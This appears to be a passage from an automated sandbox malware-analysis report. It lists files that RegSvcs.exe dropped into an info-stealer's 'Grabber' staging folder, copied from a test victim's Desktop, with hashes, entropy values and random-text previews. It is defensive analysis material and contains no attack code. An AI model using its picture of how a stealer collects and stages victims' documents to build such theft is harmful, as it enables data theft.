Preview:	BUFZSQPCOHPBYKALHMHLNSRPRTVPDQBUOCQIUAODIUEKAFQGDJEJWAHUKUUNHNODDXVOYWZMQJTURWDHVUCIFBOWJXTDYGJYMUCANKQYYQDAZPDWHSRGGYVPVGUAROKTZQVZRKBJKUQPVSBXUNUVQUXGDDRCCFXNKCRLUTRGZCDJOZFSITBSODAQBZRACSSJHBZJQSWIDQKMDSFONWLGQGIXRSOSOSXFJYJOURMXKTHTKFPJKNLLIXAXMLRXRNSAITLJNMHURDCGMLBSZZGQUPFGUIAACPLZTRSOAQAAYBEWFKSLEZHQMZKSQNGWWBKCCEEXEFKGZNXXZCVVUCQBYNKOAKNKXZAUNQWYVAHGEZRKCYLJESNPTYNSPXUTDFYXGYZZIQICBFFNUPHHCIBKOGMJGNSDDHJIRRFZCCRFOZGNWZGCDMMSOGVDCESUEEHGPRLMKANOQICCTFXCLZEKAGRGLYLWFGMAGHPKQTDONAQKSFPNLTUUXPEUGETZPBEKMCJNCMHTBKTSCNRNVDHIDSZROKAYGDUISPBLTFVLFSAFKYVLQVJPAVOFSSUSZJNMUYOAKUULNRXBYNACAQEKDHCKCIVUYLXHDFNPCCZGNQLMWIUKMGKTRDESXVITCZNHDZOVZEBRZELODDFSSMCHTFHQMHCXBMKZDOFGFTOYNRJPSRASGBJNFZWJWPLWVHAVKBBVTNIPRUSXAFVYCMDUDJRJPWXFBWBCASKRZICWOFTNARKKQDFROZXDUUROLEJYXUQIETKBJKCQLMILRYABQHMQMPXTIBHFCVWURUXTHWCBAFLDWENGHOTDBECRYJDNCGXVYIOAMIANPSNYYMCPEBELRZLSAHCILCJUWSKZHDCDQPSCITMLNPHLHXANDSONCLLAEXJRKDMXZINBJKHEASISSKRWUYGFHFYXHMNYBHGOHNEUAJQYLOQBNHYGIGKJPTHMVWRDOPYXIXGSHDTONANJGYWXHUWUKASCHBKX

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694579526837108
Encrypted:	false
SSDEEP:	24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
MD5:	2DB1C5AA015E3F413D41884AC02B89BC
SHA1:	4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
SHA-256:	956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
SHA-512:	C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
Malicious:	false
Preview:	LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\AQRFEVRTGL.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\BXAJUJAOEO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:	24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\NIRMEKAMZH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	true
